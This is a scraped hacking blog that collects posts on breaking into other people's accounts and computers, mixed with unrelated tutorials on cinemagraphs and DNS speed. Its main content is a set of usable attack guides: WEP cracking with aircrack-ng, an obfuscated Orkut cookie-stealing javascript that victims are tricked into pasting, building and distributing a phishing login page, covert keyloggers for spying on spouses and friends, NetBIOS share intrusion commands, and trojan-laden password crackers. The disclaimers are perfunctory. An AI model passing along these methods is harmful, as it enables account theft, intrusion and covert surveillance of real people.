Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips


How To Break Password Behind The Stars

Ever wanted to know what is behind those ******** passwords. For example if you want to know password from facebook account that somebody else have typed and left it. Here is post which will help you. .
1)How to break hidden passwords ******** in firefox
This is simple. Just copy and paste the following javascript code when in your address bar whenever you are on a site with a login form and it will display the password behind ****** right away.
Javascript Code :

break password
password

Enter email address where you want to receive tutorials when we post them! It’s free!
2)How to break hidden passwords ******** in Internet Explorer
Download Asterisk Key and run it. When you are on a site with a login form click Show Internet Explorer Passwords

2)How to break hidden passwords ******** in some applications
To do it, you should use free password reader utility called SC-PassUnleash. But, it only works on certain FTP clients and email clients.
Download: SC-PassUnleash

Cracking The WEP Key With Backtrack 5

As announced before we would be writing related to wifi attacks and security, This post is the second part of our series on wifi attacks and Security, In the first part we discussed about various terminologies related to wifi attacks and security and discussed couple of attacks. This post will also show you how one can easily crack WEP keys in no time.


Security Issues With WEP


WEP (Wired Equivalent Privacy) was proved full of flaws back in 2001, WEP protocol itself has some weakness which allows the attackers to crack them in no time. The biggest flaw probably in a WEP key is that it supports only 40bit encryption which means that there are 16million possibilities only.

For more information on WEP flaws, kindly read the WEP flaws section here.

Requirements :-

Here is what you would require to crack a WEP key:

1. Backtrack or any other Linux distro with aircrack-ng installed

2. A Wifi adapter capable of injecting packets , For this tutorial I will use Alfa AWUS036H which is a very popular card and it performs well with Backtrack

You can find compatible wifi card lists here.

Procedure :-

First Login to your Backtrack / Linux distro and plug in your Wifi adpter , Open a new konsole and type in the following commands

ifconfig wlan0 up



where wlan0 is the name of the wireless card ,it can be different .To see all wireless cards connected to your system simply type in " iwconfig ".


Putting your WiFi Adapter on Monitor Mode

To begin, you’ll need to first put your wireless adapter into monitor mode , Monitor mode is the mode whereby your card can listen to every packet in the air , You can put your card into monitor mode by typing in the following commands

airmon-ng start (your interface)

Example :- airmon-ng start wlan0



Now a new interface mon0 will be created , You can see the new interface is in monitor mode by entering "iwconfig mon0" as shown



Finding a suitable Target

After putting your card into monitor mode ,we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command

airodump-ng mon0



Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type ,

Now look out for a wep protected network In my case i’ll take “linksys “ as my target for rest of the tutorial

Attacking The Target

Now to crack the WEP key you'll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands

airodump-ng mon0 --bssid -c (channel ) -w (file name to save )



As my target is broadcasted in channel 6 and has a bssid "98:fc:11:c9:14:22" ,I give in the following commands and save the captured data as "RHAWEP"

airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP


Using Aireplay to Speed up the cracking

Now you’ll have to capture at least 20,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then start capturing the data packets but this method is very slow, it can take days or even weeks to capture that many data packets

The second method would be an (active attack )this method is fast and only takes minutes to generate and inject that many packets .

In an active attack you'll have do a Fake authentication (connect) with the AP ,then you'll have to generate and inject packets. This can be done very easily by entering the following commands

aireplay-ng - 1 3 -a (bssid of the target ) (interface)



In my case i enter the following commands

aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0


After doing a fake authentication ,now its time to generate and inject Arp packets . To this you'll have to open a new Konsole simultaneously and type in the following commands

aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface)



In my case i enter
aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0

If this step was successful you'll see Lot of data packets in the airodump capture as shown



Wait till it reaches 20000 packets , best would be to wait till it reaches around 80,000 to 90,000 packets .Its simple more the packets less the time to crack .Once you’ve captured enough number of packets, close all the process's by clicking the into mark which is there on the terminal


Cracking WEP key using Aircrack


Now its time crack the WEP key from the captured data, Enter the following commands in a new konsole to crack the WEP key

aircrack-ng (name of the file )

In my case i enter
aircrack-ng RHAWEP-0.1-cap

With in a few minutes Aircrak will crack the WEP key as shown



Once the crack is successful you will be left with the KEY! Remove the colons from the output and you’ll have your WEP Key.

Hope You Enjoyed this tutorial ,For further Doubts and clarifications please pass your comments

How To Hack Mobile Phones Through Bluetooth

Yes guys it is the mobile bluetooth hacker. It is a software which can be used to hack any mobile phone through bluetooth network. Once connected to a another phone via bluetooth you can do the following:
1) Call from his phone. It includes all call functions like hold etc.
2) Read his messages
3) Read his contacts
4) Change profile

5) Play his ringtone even if phone is on silent
6) Play his songs(in his phone)
7) Restart the phone
8) Switch off the phone
9) Restore factory settings
10) Change ringing volume
Notes:
1.) When connecting devices use a code 0000
2.) At start of programming on smartphones do not forget to turn on bluetooth before start of the application
What else you want
Just go and downlaod it
download
enjoy and keep visiting us

Disclaimer

"Learn How to hack" is not a blog which promotes encourages and exite hackers,But its purpose is to aware people that what is going around. But in reality, our goal is to prevent hacking. We believe that unless you know how to hack (ethically), you cannot defend yourself from malicious hack attacks. Know Hacking but No Hacking!


Difference b/w ethical hacking and non Etihcal hacking:




ETHICAL HACKING:


The practice of breaking into computers without malicious intent, simply to find security hazards and report them to the people responsible.
The concept of "ethical hacking" is questionable because most people do notwant strangers trying to break into their computers, no matter how benign the motives. Malicious crackers almost always claim to be "ethical hackers" when caught.We do not allow strangers to attempt "ethical lockpicking" or "ethical burglary." Experiments to test the security of a system should only be done with the advance permission of the victim.




NON ETHICAL HACKING:


.They may use computers to attack systems for profit, for fun, or for political motivations or as a part of a social cause. Such penetration often involves modification and/or destruction of data, and is done without authorization and hence they should not be confused with ethical hackers.
They also may distribute computer viruses, Internet worms, and deliver spam through the use of botnets. The term may also refer to hackers who crack software to remove protection methods: copy prevention, trial/demo version, serial number, hardware key, date checks, CD check (NO-CD) or software annoyances like nag screens and adware.


Few articles (posts) on this site may contain the information related Hacking not the GUIDES of Hacking. They only provide information about the legal ways of retrieving the passwords. You shall not misuse the information to gain unauthorised access.


Some of the tricks provided by us may no longer work due to fixture in the bugs that enabled the exploits. We are not responsible for any direct or indirect damage caused due to the usage of the hacks provided on this site.


Warning:Hacking is a crime and we are not responsible for the way you use it

The Hacker Club 4 U

A Beginners Guide to Ethical Hacking launched

I am very happy to tell you that my book "A Beginners guide to Ethical Hacking" has just launched.I have been working on this book for past few months.I have dedicated this book completely to beginners who want to become hackers.



 


How will the information in the book affect me?

  • You will learn All Ethical hacking techniques and also you will learn to apply them in real world situation
  • You will start to think like hackers
  • Secure your computer from trojans,worms, Adwares etc
  • Amaze your friends with your newly learned tricks
  • You will be able to protect your self from future hack attacks

And Much more...

Reality about Password Hacking softwares

You might have heard about some paid password hacking softwares which claim to hack a password on entering the email account.But in reality all those softwares are fake.If you believe what they say then you are just wasting your time and money.These all softwares are fake.If there exists such a software, will there be any security on web. And all expert engineers at Google, Yahoo and other services are not mad. They are all engaged in ensuring security of their customers ie email account owners. So, no such software exists.
So stop wasting your time and money on these foolish softwares and services and learn real Ethical Hacking methods which hackers use to access email accounts.

For Download Link visit the following site
Ethical Hacking Book

Hack orkut account - cookie hack

Are You curious to Hack orkut account?,here is the answer.
Procedure for Hacking orkut account cookie hack from mozilla firefox to hack gmail or orkut is given below.

"Hacking orkut account " or gmail by "stealing orkut account cookies" :

The post explains how one can steal cookies to hack orkut account or gmail account. No password cracking method required.



Update:This hack is now fixed by orkut and does not work now  but you can read it for  extending your knowledge you can see orkut hacking section for more Hacking tips

Steps to hack gmail or "Hacking orkut account by cookie hack " :-

1.Firstly you need have Mozilla firefox.
2.Download cookie editor plugin for Mozilla firefox from:

https://addons.mozilla.org/en-US/firefox/addon/573

3.You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you have to receive orkut cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.

Cookie Script:


javascript:nobody=replyForm;nobody.toUserId.value=33454211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()


How to use orkut cookies script?

1. Replace your number "UserId.value=33454211"

How to Replace your Number
1. Go to your Orkut album
2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
3. Now replace your value with the value in the java script.


Your script will look like.


javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()
2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter.

3.You'll get his orkut account cookie in your scrap book.

4.After getting a orkut account cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools--> Cookie editor)

5.click filter/refresh.look for 'orkut_state' cookie. just double click it and replace the orkut_state part with your victim's Script
put ur eight digit number in the place of (33444211).

Thats it your done with

Logout of your orkut and login again and you'll be in your victims Homepage.
Here is how you Hack orkut account by cookie hack

6.So remember guys...if you are having orkut account or having any other account....never use any suspicious script to prevent anyone from hacking/accessing with your orkut account

Hack orkut using fake login page



Hack orkut

I have showed you some ways to hack orkut in my last post 6 ways on how to hack orkut account If you take a look at this post you will find in orkut Hacking techniques i have wrote Phishing(Fake login pages) at the First number.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.


                       Steps to Hack orkut using Fake login page

Step 1:

Download orkut:fake login page

Step 2:

Then extract the contents into a folder

Step 3:
Then edit login.php .(right click and then select edit)

In that ,find (CTRL+F) 'http://thehackerclub.blogspot.com' then change it to your destined URL but don't forget '\'.
Save it .

Step 4:

Create an id in 110mb.com,ripway.com,t35.com or any other free webhosting site

Step 5:
Then upload the contents into a directory
For that,after creating an id you should go to file manager and upload all these files.

Step 6:
Then just got to Orkut.htm and try out whether its working .
After you type the file , a password file will be created in the same directory .
Then you can see what username and password you have entered.

Step 7:
Distribute the orkut.HTML URL (ie: yoursite.com/orkut.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.

6 ways on How to hack orkut account

Most of people are curious to know on How to hack orkut account,due to rise in number of hackers,orkut security has became a challenging question for the security experts,my purpose of this post is not to teach you hacking but to make you aware of the hackers,Below are some of the methods written through which a hacker can hack an orkut account







                                
How to hack orkut account-methods


1.Orkut Phishing:
As i have stated in all articles, Phishing is first priority to hack Orkut passwords. Infact, it is most favorite method of orkut hackers. Here, you have to send a fake orkut login page (orkut phisher) to orkut friend and ask him to login to orkut account by this fake orkut login phisher. This orkut phisher is, ofcourse, prepared by you. When orkut friend logs in to orkut account by this orkut phisher, his orkut password is emailed to you and thus you can now hack his orkut account. I have added a post on Hack orkut using fake login page


2.Keylogging :
This is most easy way to hack orkut password. Here, you have to install keylogger software on victim computer and give destination at which keylogger will send all passwords typed on friend's computer. And then keylogger will start recording all keystrokes on victim computer and send these passwords. This keylogging becomes more easy if you have physical access to victim computer. Even, remote keylogger installation can be done. i have a made a post on Which spyware keylogger softwares to choose the following post will tell you about the best best keyloggers availible now days.


3.Community links :
Many times, you are provided with community links in orkut scraps inviting you to join it. On clicking the link in orkut scrap, you are directed to orkut phisher explained above, ready to hack orkut account profile .I have made a post to Hacking orkut through community links,


4. Orkut Javascript hack :
This method became much famous in last year. Here, orkut victim is provided with some javascript (popularly called code) and is asked to copy paste this javascript code in his address bar for say changing his orkut theme. When victim does this, his orkut cookies are stolen and now orkut hacker has hacked his orkut profile using cookies. I have written more on orkut cookie stealing in Hack Orkut account account by Cookie stealing.


5. Link manipulating:
  • Link Manipulation : Link manipulation is one kind of hacking trick wherehackers fool people with identical domain names. By an email or scrap or message, they send you a link. Once you enter your ID and password in those pages, be sure that your profile is gone for ever. That link will be 90% identical with Orkut. Here are few of them.
  • www.orukt.com
    www.community-orkut.com
    www.orkut-login.com
    while the original Orkut domain is www.orkut.com


6. Primary email address hack
If orkut hacker, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this orkut hacker can easily hack your orkut account using "Forgot password" trick. He will simply ask orkut to send password reset email to your primary email address- which is already hacked. Thus, your orkut account password will be reset and orkut account hacked !!!


So, always remember to protect your orkut primary email address and try to keep unknown or useless mail id as your primary email address

5 easy ways to Hack Email account passwords



Hack an email account


"How to hack email accounts passwords?" So many people have asked that question,and honestly its a dumb one,.There are many ways to hack an email account passwords but i am covering here 5 of them:
1.Phishing
2.Keylogging
3.Brute forcing
4.Social engineering
5.Guessing the secret question

5 ways to Hack email accounts

Phishing:
This is the most easiest way to hack an email account password Phishing is a way of saying keylogger but in an other meaning.Let’s say you want to create a hotmail phishing page.The page should look
exactly like the real one.
How does it work:

You can download/make a replica of the website you want to phish.And save is as HTML.When you’re done with that,you have to find a way
to upload the HTML.Best way is a Website.Like Piczo/Blogspot.When thats done the user types his/hers username and password.And automatically
it will be sent to you by mail.And there you have it,that’s Phishing.

For more information on see  post  How to create fake login page for any site

Brute Forcing
Brute Forcing is like guessing the password but instead you make/download a password list[a long txt file containing words that might be
the password] ad the Brute Forcer tries them all
Download your Msn Brute Forcer Here:
 [may find a trojan inside but that's normal]





Keyloggers
With keylogger you can easily hack an email account.Keyloggers is like phishing but is more simple.Its a simple .exe executable.When someone clicks it,the Keylogger auto downloads.And you’ll
have ,on your computer,you start it,and put in the ip of the destination,and every hour you’ll receive keys pressed on his computer thats an easy way to find out msn passwords  i have made a post on ,which explains best keylogger  in the trade

Social engineering:
In  Hacking and security , social engineering is a broad term used to describe a non-technical aspect of information technology crime that relies heavily,on human interaction and often involves tricking other people to break normal security procedures




Guessing The Secret Question

If you know your friends,this will be an easy task.Go to http://www.hotmail.com and click forgot password,then put in the email address
and then the CATCHA code,reply on the secret question,but beware because you have like 3 tries only.

Warning:This post "How to Hack email accounts" is is truly for educational purposes

Which spyware keylogger software to choose?




Photobucket
I continue the series of providing you with information of best spware keylogger softwares availible online.In this post i will tell you about all the best spyware products availible for various purposes.Today there exists many of spyware keylogger softwares because a lot of people want to monitor the activities of their children, spouse, friends etc.Most of people try to find thier crack version or serial key and end them self in infecting their PC  with Viruses.Most of people are confused with selection b/w Spyware keylogger software,so today the Title of my post is "Which spyware keylogger software to choose?"

What exactly is a Monitoring Software and how can it help me ?

A computer monitoring software is just like any other software (program) which when installed, secretly monitors each and every activity that takes place on the computer. The activities such as web browsing, chatting, gaming etc. are all recorded and saved. These monitoring softwares can record each and every keystroke. So it is possible to capture usernames and passwords very easily with minimum effort. Monitoring softwares are also commonly known as Keyloggers.

How can i install a spyware keylogger software?
 
Installing a spyware keylogger software is very simple,even a person with basic knowledge of computer can use and monitor each and every activity that takes place on the computer.You need to setup a secret password and hotkey combination which is required later to see the recorded data ( logs). After the installation is complete the software goes invisible,once the software gets installed it will sent you recorded data(logs) and screen shots of the activities that takes place on your computer.

Which spyware keylogger software to choose?


There exists different flavours of these softwares and you have to choose the one that best match your needs. Here is a list of some of the best monitoring programs that I recommend.


For monitoring your own PC:

If you want to monitor your own PC you can i recommend the following spyware software:

Spyagent:


Spytech SpyAgent is our award winning, powerful computer spy software that allows you to monitor EVERYTHING users do on your computer - in total stealth. SpyAgent provides a large array of essential computer monitoring features
Click here to goto official website of spyagent


Keystroke spy:

Keystroke Spy is a powerful tool that can log every keystroke users type and capture screenshots of their activities. Keystroke Spy can run in total stealth, email you when specific keywords are typed, and can even be set to only log keystrokes typed in specific applications. With Keystroke Spy you will be able to log websites users visit, emails they send, passwords they use, applications they interact with, typed documents, and see everything they did with visual screenshot playback!



For monitoring a Remote PC:

If you want to monitor a Remote PC then the following softwares are Recommended:

Sniperspy:
 
SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.

Hacking into another persons computer

The following article explains the method used for hacking into another persons computer remotely using command prompt in your network ie network computer hacking,I have also posted another article regarding computer hacking termed as How to hack a computer by netbios Hacking,which has a greater sucess rate than this method and written with relavent screen shots



Hacking into another persons computer - Method



Step 1
First of all,get a good IP scanner angry ip scanner is a good one you can get it here:
Angry ip scanner Download

Step 2
Now click on start and then goto run and then type there "CMD" and press ok

 This is what you see:
c:\windows>

Now this is what you have to do ---->>>

Replace 255.255.255.255 with the victims IP address., i have wrote another article on How to trace

an ip address of the victims computer

c:\windows>nbtstat -a 255.255.255.255

If you see this your in NetBIOS Remote Machine Name Table

Name Type Status ---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find  another victim.

Step 3:

Type down:

c:\windows>net view \\255.255.255.255

If the output is like this:

Shared resources at \\255.255.255.255
ComputerNameGoesHere


Sharename Type Used as Comment

------------------------------------------------------------
CDISK Disk xxxxx xxxxx

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

you can replace x: by any letter you want but not the letter of your own drive.

CDISK is the name of the shared harddrive. 


Now type:
c:\windows>net use x: \\255.255.255.255\CDISK

If the command is successful you are a small time hacker.

Now open windows explorer or just double click on the My Computer icon on your
desktop and you will see a new network drive X:.


Note to newbies: This hack will only work if you have the ip of someone on your network. It will not work if the ip of the person you want to "hack" is not on your network.

Tip: If you can only access your targets shared folder put a batch file in their shared folder with the command C=C if they open it,it will share their hardrive.

You may also like:
*Hack msn messenger password
 

Hack msn messenger password

I recently made post on How to hack msn account account password,I got a tremendorous feedback,but the problem with that method to hack msn messenger was that you need to have acess in victims computer.So i am posting here a method to hack msn messenger password with out having acess to victims computer.


 
The method i would use here is a dictionary attack.

Dictionary attack:

A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by searching likely possibilities.
A dictionary attack uses a brute-force technique of successively trying all the words in an exhaustive list (from a pre-arranged list of values). In contrast with a normal brute force attack, where a large proportion key space is searched systematically, a dictionary attack tries only those possibilities which are most likely to succeed, typically derived from a list of words in a dictionary.


Method:

1.First Download
msn messenger account hacker

2.Extract all files.

3.Open
Msn account hacker
Hack msn

4.Browse passwords list and select
example_list

5.NOw it will start to
hack msn messenger password.

This will only work if
victims password is present in the password list.

This process is quite slow since it goes through
Secure Socket Layer uses SSL encryption. This tool can approximately test 17 passwords per minute, although it varies according to the connection of the user and also the Hotmail server.

I believe that the recovery rate to
hack msn messenger password or Hotmail account is very very low even though this tool works. This is because there are millions of words and also the user’s password is not necessary a valid word. Moreover, Hotmail password is “Case Sensitive”. Case Sensitive means the ability to distinguish between uppercase (capital) and lowercase (small) letters. So it will treat the word RUN differently from run.

I tried to hack my
msn messenger password and to my surprise, it does work! Before I started to hack msn messenger account, I’ve inserted my password into the dictionary list to see if it can process the list correctly.

How to Hack msn account password



hack msn account passwords
Most of people ask me to teach me a way to hack msn accout password
This is not actually hacking but recovering passwords These msn hacking softwares are actually “Password Recovery for MSN” . Actually, the msn hacker programs is intended to recover forgotten msn, hotmail passwords. But, i will focus on how one can hack msn account password

Now there are a bit of requirements

First you victim must have used a IM(instant messenger) at least once with this id. Say for yahoo he must use yahoo messenger.Online versions dont count.So this means you cannot hack accounts of say facebook or myspace which dont have their IM

Second you must have access to his comp where he has used the IM.

Third he must not have formatted his system recently or he must have used the IM after format.

These requirements are tough, i know.You will hit a jackpot if you are on shared comp as it's not frequently formatted and many use IM.You can even ask him to use the IM on your comp.Once you fullfill these job's almost done.
Now you are ready to hack "msn account passwords"
Now you can use these password recovery software to get hold of your victims password These softwares have high success rate but not 100%. I am giving all trial download links .If you want the full version visit your fav torrent or rapidshare or megaupload.The will not crack any passwords greater than 4 chars which mean syou cant hack most accounts as they require atleast 6 chars.

You will have to temporarily stop the Antivirus as your antivirus will detect it as spyware. But they are Spyware free !00% safe

MessenPass 1.16

Instant Messengers Password Recovery Master

Advanced Instant Messengers Password Recovery 3.4

How Password Recovery for MSN works???



Password Recovery for MSN scans computer for locally stored MSN and Hotmail passwords. Now, remember that MSN Hotmail passwords are stored only if one checks “Remember Me” box. If you have locally stored password on PC , then you can get back or recover forgotten MSN & Hotmail passwords.


How to hack msn account passwords


Now the question arrives that How to hack accounts using these software the answer is simple,Just, run the program on victim computer and click “Recover Password” and you get his MSN Hotmail account passwords,now you will ask how to acess get in victims computer the answer is simple
Read my post on:
Hacking into other persons computer

Fake Msn
Fake msn is just a replica of Msn Messenger.Let some of your friends come over.And open up the fake msn.Let them type in ther
msn hotmail,and their password.Then they will get a troubleshoot , and their username/password will be saved in a .txt file in C:\

Warning:
This post How to hack msn account passwords is for educational purposes,Use this only to get lost passwords of your account.

How to Create Animated Cinemagraphs

Cinemagraphs are a really compelling take on the traditional animated GIF, only showing motion in a portion of the frame to focus on a specific movement. This results in a very compelling looped animation and we're going to show you how to make one right now.

How to Create Animated CinemagraphsTo give credit where credit is due, the cinemagraph began with Jamie Beck and Kevin Burg on their tumblog From Me to You. (More on the history of Cinemagraphs here.) They've created some pretty amazing stuff, like the example on the left, so be sure to check out their work for inspiration.
How to Create Animated CinemagraphsOur example isn't quite so elegant. (You can see it to the right.) As an example, I put together an (imperfect) cinemgraph that makes it look like I'm digging around in my nose for, let's say, buried treasure. In this post I'm going to show you how I made it so you can make your own, perhaps more tasteful, cinemagraphs. This process is better demonstrated on video, so watch the one at the top of the page for an in-depth walkthrough. If you want step-by-step instructions in text form, read on.

Step One: Come Up with an Idea and Shoot a Short Movie Clip

How to Create Animated CinemagraphsTo get started, you're going to need a movie clip to work with. You want to choose something where the motion on display can be isolated nicely. Coffee stirring and nose picking are just two options. There are plenty of others. Just avoid getting too close to your subject as you want the surrounding areas to be entirely still.
Once you know what you're going to do, record a short movie clip. Start with something very simple, as the longer the clip is the more frames you'll have to pull. 20-30 frames can be fairly time consuming, as you have to isolate the moving area in every single one, so be careful about being too ambitious. Creating a cinemagraph can be very time consuming, so limit the frames you need as best you can.
When you're done shooting your clip, transfer it over to your computer. It's time to get to work.

Step Two: Create Your Frames in Photoshop

Photoshop can open movie files, so just drag your clip onto the app and you'll see the first frame like it's a standard still image. (Note: Photoshop can't read every type of file, so convert to an MP4 if you're having trouble with formats.) There are a lot of ways to move the frames you want to use into a new Photoshop document, but I like to copy them individually because I can skip certain frames that are unnecessary and choose exactly where I want to start and end in the clip. If you prefer another method, go right ahead. To start copying frames, go to the Window menu and open the animation panel. Scroll to the first frame you want to use in your movie clip, select all (Command/Control+A), and copy. Now paste that frame into a new layer in a new Photoshop document. You want to keep doing this for all the frames you're going to use. When you're done, you can close the movie clip and focus on the new Photoshop document.

Step Three: Isolate the Motion in Every Frame

How to Create Animated CinemagraphsThis part of the process is the most time-consuming. Basically, you need to erase the parts of each frame that you don't want to move. I like to do this by selecting the relevant, moving part with the polygonal lasso, inverting my selection (Command/Control+Shift+I), and refining the edge of that selection (Command/Control+Option/Alt+R) to increase the feather size so the edges are nice and soft. (You can also have a built-in feather by adjusting the settings of the polygonal lasso if you prefer.) Once you've done all that, just press the Delete key to remove the parts you don't need. Now repeat this for every frame.

Step Four: Tell Photoshop How You Want Your Animation to Play

How to Create Animated CinemagraphsCreating the animation is pretty easy because you've basically done that already. You just need to go into the Animation panel you opened earlier and start by clicking the Frame Mode button. It's the one all the way in the bottom right corner. When you do that you should just have one frame. Make sure it looks like the starting point—meaning the only layer that's showing in your layers panel is the first frame—and then go ahead and click the "Duplicate Frame" button. (It's the one that looks like a little page icon and is to the left of the middle in the panel.) This will create a new frame based on the previous one, and you can go ahead and display the next frame in your animation. I did this by creating each frame in its own layer, then showing only the one that was supposed to be visible. (You can see this demonstrated in the video up at the top of the post.) You'll need to repeat this process for every frame. Just press the "Duplicate Frame" button, show the next frame, and keep repeating the process until every frame has been added.
At this point you're basically done with the animation, but you'll probably want to set the duration to something other than the default. Generally the default is 10 seconds, which is very slow. Generally you'll want to set it to "No Delay", but you can fool around with the options and decide what you want. To choose a duration, just select all the frames you want to change and click on the duration on the bottom of one of the frames. Choose what you want, or set a custom amount. You may want to adjust individual frames to last slightly longer than others. Go ahead and play around with your options until you get the motion you desire.

Step Five: Save for Web

Now all you have to do is save your image. Go to the File menu and choose "Save for Web & Devices". Be sure to choose GIF 128-bit Dithered as your preset and check the animation box in the bottom right corner of the screen (if it isn't checked already). You can make other alterations, but generally all you'll need to do here is save. Once you're done, that's it. You've created a cinemagraph. That's all there is to it! If you make your own cinemagraph, share it in the comments!

Skype Password Hacking Software Free Download

Get your lost Skype passwords back with our FREE Skype password hacking software!

We are offering our free Skype password hacking software free of charge through this website for a limited time only! Our Skype password hack allows you to retrieve your lost or forgotten Skype password completely free of charge. Reliable Skype hacking software is pretty tough to locate on the Internet, especially FREE Skype hacking software!
Our Skype password hacking program is called Skype Password Retriever PRO, it is designed with the average Internet user in mind witch means it's really easy to use, you can now retrieve Skype passwords through a simple 1,2,3 process! Skype hacking has never been easier!

Skype Password Retriever PRO: Free Download


 
How to Hack a Skype Account?
1) Download and Install The Software shown bellow.
2) Select the Skype account you want hacked and click crack.
3) You're done!
(Screenshot of the Skype Hacker PRO)
Gmail Password Hacking Software Free Download - Screenshot
 
 

 
 

How To Speed Up Your Web Browsing in a Few Clicks: A Brief Introduction to DNS

Every millisecond counts when you're browsing the web, and if you'd like to eke a bit more speed out of your internet connection, you can change your DNS server to make those pages load a bit faster. Here's a brief introduction to what DNS is, how it affects your connection speed, and how you can easily change your computer's settings to use the fastest DNS possible.
Photo by Studio 37/Shutterstock.

What Is DNS and How Does It Influence My Internet Speed?

Computers use IP addresses to connect to one another. IP addresses are a series of numbers that act as digital addresses that allow computers to send information back and forth. Those long strings of numbers are easy for computers to remember, but human beings aren't made to store long strings of digits. We are, however, really good at remembering names. That's where DNS comes in.
When you type a web address in your browser, your computer routes that the domain address through what's called a Domain Name System (DNS) and turns, for example, the human-friendly web address http://lifehacker.com into a computer-friendly IP address, like 69.60.7.199. Essentially, DNS is what allows you to use easy-to-remember site URLs—like "lifehacker.com"—rather than memorize a bunch of IP address.
Every internet service provider usually has their own DNS server, but it's not always the fastest. Often, the fastest DNS server is the one that's physically closest to your location. If you switch to a faster one, that means it looks up those IP addresses and gets you where you want to go faster than before. It may not seem like a lot, but when a page has to load things from a handful of different sources—like, say, advertisements or videos—it can add up.
Third-party DNS servers can also have other perks, like content filtering. We've talked about alternate DNS servers before, like OpenDNS and Google Public DNS, but if you want to find out which one's right for you, you can do so with a simple program.

How to Determine and Set Up the Fastest DNS Server for Your Connection

On Windows: You can change Windows' DNS settings deep in the Control Panel, but the free DNS Jumper makes it a lot easier:
  1. Download DNS Jumper, and extract it to any location on your hard drive. It's a portable application, so there's no need to install it—just start it up.
  2. If you know what DNS server you want to use, pick it from the drop-down menu or type it in the boxes at the bottom. If not, hit the "Fastest DNS" button on the left. It'll check a number of different servers to find out which one is the fastest for you.
  3. When it's done, click the "Apply DNS Servers" button to use the fastest server.
Sometimes, your ISP's default DNS server really is the fastest, but other times, it could be something else, so even if it ends up being the ones you already use, it was still worth running the test to find out. When you're done, you can delete the app or file it away for future use.
On OS X: If you're on a Mac, you can try a utility like previously mentioned Namebench. It isn't quite as fast as the Windows alternative, and you'll still have to apply your DNS settings manually, but it works:
  1. Download Namebench and start it up. Again, you don't need to install, just double click on it to run it.
  2. Make sure the top two checkboxes are checked, and choose your location from the "Your Location" dropdown menu. Then, hit the "Start" button to run the test.
  3. Once Namebench returns a result, mark down the IP addresses it lists and head to System Preferences > Network. Choose your network connection from the left (AirPort if you use Wi-Fi, Ethernet if you use Ethernet), and hit Advanced. Go to the DNS tab.
  4. If the IP addresses in the left pane are different than the ones Namebench found, select them and hit the minus sign below them. Then, click the plus sign to add new servers. Use the two IP addresses that Namebench came up with, and then close System Preferences.
Again, you may find thatyou're already using the fastest DNS server, but if you're not, this can give your web browsing a minor speed boost.
This process won't make your internet twice as fast or anything, of course. If your internet's slow as molasses, it'll probably still be pretty slow after this, but it should shave a small bit of time when loading pages—and us internet junkies know, a few milliseconds can make a difference.

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More